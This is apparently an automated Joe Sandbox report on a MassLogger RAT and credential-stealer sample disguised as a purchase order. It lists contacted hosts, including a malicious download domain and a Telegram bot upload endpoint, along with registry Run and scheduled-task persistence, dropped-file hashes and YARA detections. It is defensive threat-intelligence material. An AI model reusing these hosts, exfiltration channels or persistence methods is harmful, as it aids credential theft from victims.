00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false | Reputation: high

Name: http://ocsp.sectigo.com0
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false | Reputation: high

Name: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmp
Malicious: false | Reputation: high

Name: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmp
Malicious: false | Reputation: high

Name: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
                                                      high
                                                      http://reallyfreegeoip.orgdMicrosofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.microsoft.copowershell.exe, 00000007.00000002.23005690561.0000000003119000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://reallyfreegeoip.org/xml/102.129.153.238dMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.google.com/chrome/?p=plugin_flashMicrosofts.exe, 00000006.00000002.24180228176.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://checkip.dyndns.orgMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/Pester/Pester4powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://lwaziacademy.com/wps/200PO_B2W984.com, 00000000.00000002.22975988044.0000000020D1D000.00000004.00001000.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://checkip.dyndns.comdMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/102.129.153.238lMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://lwaziacademy.com/PO_B2W984.com, 00000000.00000002.22965692413.000000000090E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://checkip.dyndns.org/qMicrosofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contoso.com/powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://reallyfreegeoip.orgMicrosofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://checkip.dyndns.orgdMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://reallyfreegeoip.orgMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.quovadis.bm0PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://checkip.dyndns.comMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ocsp.quovadisoffshore.com0PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://checkip.dyndns.org/dMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMicrosofts.exe, 00000006.00000002.24180228176.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://ocsp.sectigo.com0CPO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://api.telegram.org/bot-/sendDocument?chat_id=Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drfalse
                                                                                                      high
                                                                                                      http://www.pmail.com0PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22981256081.000000002293B000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://lwaziacademy.com/wps/200_OupzhkprnvwEPO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://reallyfreegeoip.org/xml/Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drfalse
                                                                                                        high
Legend (share of contacted IPs per entry):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
41.185.8.252 | lwaziacademy.com | South Africa | 36943 | GridhostZA | true
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583547
Start date and time: 2025-01-03 02:44:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO_B2W984.com
Detection: MAL
Classification: mal100.troj.spyw.evad.winCOM@33/17@4/3
EGA Information:
• Successful, ratio: 88.9%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 213
• Number of non-executed functions: 70
Cookbook Comments:
• Found application associated with file extension: .com
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Execution Graph export aborted for target Trading_AIBot.exe, PID 1008 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:47:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
02:47:16 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
02:47:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
02:47:29 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
20:47:05 | API Interceptor | 2x Sleep call for process: PO_B2W984.com modified
20:47:15 | API Interceptor | 9x Sleep call for process: powershell.exe modified
20:47:21 | API Interceptor | 4x Sleep call for process: Oupzhkpr.PIF modified
20:47:51 | API Interceptor | 87948x Sleep call for process: apihost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
132.226.8.169 | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
 | 0001.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | PK241200518-EMAIL RELEASE-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | checkip.dyndns.org/
 | CITAS_pif.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | conferma..exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | file.exe | malicious | Snake Keylogger | checkip.dyndns.org/
41.185.8.252 | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer |
 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer |
Match / Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org
  file.exe | malicious | Snake Keylogger | context: 188.114.96.3
  file.exe | malicious | Snake Keylogger | context: 188.114.97.3
  file.exe | malicious | Snake Keylogger | context: 188.114.96.3
  PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | context: 188.114.96.3
  image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | context: 188.114.97.3
  DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
  file.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.96.3
  PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | context: 188.114.96.3
  PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | context: 188.114.97.3
  Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | context: 188.114.96.3
lwaziacademy.com
  PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | context: 41.185.8.252
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | context: 41.185.8.252
checkip.dyndns.com
  file.exe | malicious | Snake Keylogger | context: 132.226.247.73
  file.exe | malicious | Snake Keylogger | context: 193.122.130.0
  file.exe | malicious | Snake Keylogger | context: 158.101.44.242
  PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | context: 158.101.44.242
  image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | context: 193.122.130.0
  DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | context: 193.122.130.0
  file.exe | malicious | Snake Keylogger, VIP Keylogger | context: 193.122.6.168
  PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | context: 132.226.8.169
  PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | context: 193.122.130.0
  Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | context: 132.226.247.73
Match / Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS
  http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12 | malicious | Unknown | context: 1.1.1.1
  ogVinh0jhq.exe | malicious | DCRat | context: 104.20.4.235
  https://myburbank-uat.3didemo.com | malicious | HTMLPhisher | context: 104.26.13.57
  hiwA7Blv7C.exe | malicious | Xmrig | context: 172.67.19.24
  http://hotelyetipokhara.com | malicious | Unknown | context: 104.21.96.1
  https://realpaperworks.com/wp-content/red/UhPIYa | malicious | Unknown | context: 104.21.96.1
  http://adflowtube.com | malicious | Unknown | context: 188.114.96.3
  http://authmycookie.com | malicious | Unknown | context: 172.67.198.196
  http://keywestlending.com | malicious | CAPTCHA Scam ClickFix | context: 172.64.154.248
  http://vaporblastingservices.com | malicious | Unknown | context: 104.18.26.193
UTMEMUS
  file.exe | malicious | Snake Keylogger | context: 132.226.247.73
  DEMONS.ppc.elf | malicious | Unknown | context: 132.226.227.252
  PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | context: 132.226.8.169
  Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | context: 132.226.247.73
  Dotc67890990.exe | malicious | Snake Keylogger | context: 132.226.247.73
  Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | context: 132.226.8.169
  PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | context: 132.226.8.169
  Invoice DHL - AWB 2024 E4001 - 0000731.exe | malicious | Snake Keylogger | context: 132.226.247.73
  PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT | context: 132.226.247.73
  F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | context: 132.226.8.169
GridhostZA
  PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | context: 41.185.8.252
  armv4l.elf | malicious | Mirai | context: 41.61.6.129
  3.elf | malicious | Unknown | context: 41.185.108.101
  2.elf | malicious | Unknown | context: 41.61.164.248
  1.elf | malicious | Unknown | context: 41.185.180.246
  1.elf | malicious | Unknown | context: 41.61.153.3
  2.elf | malicious | Unknown | context: 41.185.108.111
  mipsel.nn.elf | malicious | Mirai, Okiru | context: 41.185.133.158
  3.elf | malicious | Unknown | context: 41.61.164.251
  ppc.elf | malicious | Mirai, Moobot | context: 41.61.164.233
Match / Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad
  file.exe | malicious | Snake Keylogger | context: 104.21.67.152
  file.exe | malicious | Snake Keylogger | context: 104.21.67.152
  file.exe | malicious | Snake Keylogger | context: 104.21.67.152
  PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | context: 104.21.67.152
  image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | context: 104.21.67.152
  DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | context: 104.21.67.152
  NL Hybrid.exe | malicious | Titanium Proxy, PureLog Stealer | context: 104.21.67.152
  NL Hybrid.exe | malicious | Titanium Proxy, PureLog Stealer | context: 104.21.67.152
  file.exe | malicious | Snake Keylogger, VIP Keylogger | context: 104.21.67.152
  PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | context: 104.21.67.152
a0e9f5d64349fb13191bc781f81f42e1
  file.exe | malicious | LummaC | context: 41.185.8.252
  file.exe | malicious | LummaC | context: 41.185.8.252
  image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | context: 41.185.8.252
  MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown | context: 41.185.8.252
  MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown | context: 41.185.8.252
  MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown | context: 41.185.8.252
  Setup.exe.7z | malicious | Unknown | context: 41.185.8.252
  176.113.115.170.ps1 | malicious | LummaC | context: 41.185.8.252
  ETVk1yP43q.exe | malicious | AZORult | context: 41.185.8.252
Match / Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\Microsofts.exe
  PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer
  PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer
  Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe | malicious | MassLogger RAT
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
  PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer
  PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer
  Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe | malicious | MassLogger RAT
  C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer
  F7Xu8bRnXT.exe | malicious | MassLogger RAT, PureLog Stealer
  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe | malicious | MassLogger RAT, PureLog Stealer
  PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer
  IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer
  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
Process: C:\Users\Public\Libraries\rpkhzpuO.pif
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 520
Entropy (8bit): 5.37653962137826
Encrypted: false
SSDEEP: 12:Q3La/hhkvoDLI4MWuCqDLI4MWuPtXR5fOKbbDLI4MWuPJKMsDbKhav:MLUE4K5E4K1BIKDE4KhKMaKhk
MD5: 700CE124EFD2CD54F22B6C37D63668B1
SHA1: 21B5C0030C45972F1E451683A30EE6DC29E7A8AD
SHA-256: FF17BE52698BF4D59DA4F4A98E21EA17CD2F10E95C060335B4D337A870FF8316
SHA-512: A5285CBB2A4B3BA9F8F64CA15F5105C32B6DAF973B405D6C56E3ACDE5218E631EE299296AA60A9291DF5EE85079786EB60CE925E0BF126210237A2903299714F
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1804
Entropy (8bit): 5.207910328423403
Encrypted: false
SSDEEP: 48:fSHJSGfs4/ymKagv4RUgZoU99tK8NfNooc+QIrW62aVn:KHIGH/vKNIHWA2Kfo+QAW1aV
MD5: 331C5A3D7FF49B58C613EB52486FE9C7
SHA1: A5DC07F91C3BE6B8F75E5DFBBAF180B886DEB8A0
SHA-256: E2D74D28C3056D0F983F7DE8A68A5365668A1DB1BBFB4DB1951079F5A9A3025D
SHA-512: 3C841888263C9B06BAE24318B60671607F3828D387525A9420B3D55A6CE0CE1C9C234723F8283F463B7E63554AE19566A71FBD2FCC13B3F3279AED6334A164E0
Malicious: false
Preview: @...e...........................................................T...............n$....<@.{..uR.......*.Microsoft.Management.Infrastructure.Native..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4..................%`99B....9...........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell

Process: C:\Users\Public\Libraries\rpkhzpuO.pif
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 98816
Entropy (8bit): 5.666546286050177
Encrypted: false
SSDEEP: 1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
MD5: F6B8018A27BCDBAA35778849B586D31B
SHA1: 81BDE9535B07E103F89F6AEABDB873D7E35816C2
SHA-256: DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
SHA-512: AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
Malicious: true
Yara Hits:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
